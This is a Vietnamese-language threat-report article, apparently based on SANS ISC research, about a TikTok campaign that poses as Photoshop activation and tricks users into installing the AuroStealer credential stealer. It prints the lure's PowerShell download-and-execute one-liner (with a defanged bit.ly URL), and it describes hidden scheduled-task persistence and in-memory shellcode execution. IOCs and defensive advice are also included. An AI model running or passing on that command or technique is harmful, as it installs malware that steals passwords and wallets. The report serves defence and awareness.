Các tác nhân đe dọa đang khai thác phạm vi tiếp cận rộng lớn của TikTok để lừa người dùng thực thi phần mềm độc hại thông qua các video tưởng chừng vô hại. Chiến dịch tấn công mạng này cho thấy sự phát triển của các phương pháp phân phối mã độc.

Chiến dịch Tấn công Sử dụng TikTok để Phân phối Mã độc

Phương thức Khai thác Ban đầu

Trong một video TikTok phổ biến, kẻ tấn công đóng vai trò là nhà cung cấp công cụ kích hoạt Photoshop miễn phí.

Video này thúc giục người xem mở PowerShell với quyền quản trị viên và chạy một lệnh cụ thể.

Cơ chế Phân phối Mã độc Giai đoạn Đầu

Lệnh được cung cấp sử dụng Invoke-Expression (iex) để thực thi một script được tải về bởi Invoke-RestMethod (irm) từ một máy chủ độc hại.

iex ((new-object net.webclient).downloadstring('hxxps://bit.ly/3Qd7k9S'))

Kỹ thuật này phản ánh kịch bản kỹ thuật xã hội ClickFix, nơi người dùng cũng bị lừa nhấp và thực thi mã trên các blog của Microsoft, khiến họ bị cài đặt phần mềm độc hại. Bạn có thể tìm hiểu thêm về ClickFix tại GBHackers.

Các nhà nghiên cứu bảo mật đã phát hiện một chiến dịch mà các tác nhân đe dọa giả mạo làm công cụ kích hoạt Photoshop trong các clip TikTok. Họ hướng dẫn nạn nhân chạy các lệnh PowerShell một dòng để tải và thực thi mã độc. Thông tin chi tiết được công bố bởi SANS Internet Storm Center.

AuroStealer: Mã độc Thu thập Thông tin Đăng nhập

Sau khi truy cập liên kết được cung cấp, nạn nhân nhận được một payload PowerShell.

• SHA256 của payload: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23

Payload này có tỷ lệ phát hiện trên VirusTotal là 17/63, cho thấy tính mới và khả năng né tránh của nó.

Sau khi script ban đầu chạy, nó kết nối với hxxps://file-epq.pages.dev/updater.exe để tải về giai đoạn tiếp theo, có tên là Updater.exe.

• SHA256 của Updater.exe: 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8

Phân tích cho thấy tệp nhị phân này là AuroStealer, một trojan thu thập thông tin đăng nhập. Nó nổi tiếng với khả năng đánh cắp mật khẩu trình duyệt đã lưu và ví tiền điện tử.

Kỹ thuật Duy trì Quyền Truy cập (Persistence)

Để duy trì quyền truy cập, script PowerShell sẽ chọn ngẫu nhiên một tên tác vụ từ danh sách các tác vụ cập nhật hợp pháp.

Ví dụ về các tên tác vụ hợp pháp được sử dụng: AdobeUpdateTask, WindowsUpdateCheck.

Sau đó, nó tạo một tác vụ theo lịch trình (scheduled task) để khởi chạy PowerShell với kiểu cửa sổ ẩn và bỏ qua chính sách thực thi (execution policy). Điều này đảm bảo Updater.exe chạy khi người dùng đăng nhập mà không gây nghi ngờ. Kỹ thuật PowerShell này cũng được đề cập trong Operation RusticWeb tại đây.

Việc sử dụng các tên tác vụ hợp pháp giúp hoạt động độc hại hòa nhập vào hành vi hệ thống bình thường và né tránh phát hiện, làm phức tạp quá trình phát hiện xâm nhập.

Payload Giai đoạn Cuối: Mã độc Tự Biên dịch trong Bộ nhớ

Sau giai đoạn AuroStealer, một payload khác có tên source.exe được truy xuất và khởi chạy.

• SHA256 của source.exe: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011

Tệp nhị phân này sử dụng một kỹ thuật mã độc tự biên dịch nâng cao. Trong quá trình thực thi, nó gọi trình biên dịch .NET compiler csc.exe để biên dịch mã nguồn được lưu trữ trong một tệp .cmdline tạm thời.

Lớp được biên dịch chứa các khai báo P/Invoke cho VirtualAlloc, CreateThread và WaitForSingleObject. Điều này cho phép nó cấp phát bộ nhớ, inject shellcode trực tiếp vào tiến trình, tạo một luồng để thực thi và chờ vô thời hạn.

Kết quả là thực thi payload hoàn toàn trong bộ nhớ mà không chạm vào đĩa. Việc biên dịch theo yêu cầu như vậy làm phức tạp phân tích tĩnh và phát hiện, vì mã độc cuối cùng chỉ tồn tại trong bộ nhớ tạm thời.

Các Chỉ số Đe dọa (Indicators of Compromise – IOCs)

Các chỉ số đe dọa liên quan đến chiến dịch tấn công mạng này bao gồm:

• SHA256 (Payload PowerShell):6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23
• SHA256 (Updater.exe – AuroStealer):58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8
• SHA256 (source.exe – Self-compiling malware):db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011
• URL độc hại (Giai đoạn 1):hxxps://bit.ly/3Qd7k9S
• URL độc hại (Tải Updater.exe):hxxps://file-epq.pages.dev/updater.exe

Các nhà nghiên cứu đã xác định các video TikTok bổ sung từ cùng chiến dịch sử dụng các mồi nhử phần mềm khác. Ví dụ như “Activate Office” hoặc “Unlock Windows”. Điều này cho thấy kẻ tấn công đang lặp lại các chủ đề kỹ thuật xã hội để mở rộng phạm vi tiếp cận của mình.

Khuyến nghị và Phòng ngừa An ninh Mạng

Chiến dịch này nhấn mạnh các chiến thuật tấn công liên tục phát triển của tội phạm mạng. Chúng hiện đang khai thác các nền tảng video ngắn để phân phối phần mềm độc hại tự biên dịch, chạy trong bộ nhớ thông qua PowerShell.

Người dùng không bao giờ nên chạy các lệnh terminal từ các nguồn không được xác minh. Các nền tảng mạng xã hội cũng nên cân nhắc cảnh báo người xem khi các hướng dẫn khuyến khích các hoạt động có khả năng nguy hiểm.

Khi các tác nhân tấn công không ngừng đổi mới, kết hợp các kênh phân phối mới và kỹ thuật chống phân tích. Việc nâng cao nhận thức về bảo mật và các biện pháp phòng thủ điểm cuối mạnh mẽ vẫn là tuyến phòng thủ tốt nhất chống lại những mối đe dọa mạng đang nổi lên này. Nâng cao an ninh mạng là điều tối quan trọng.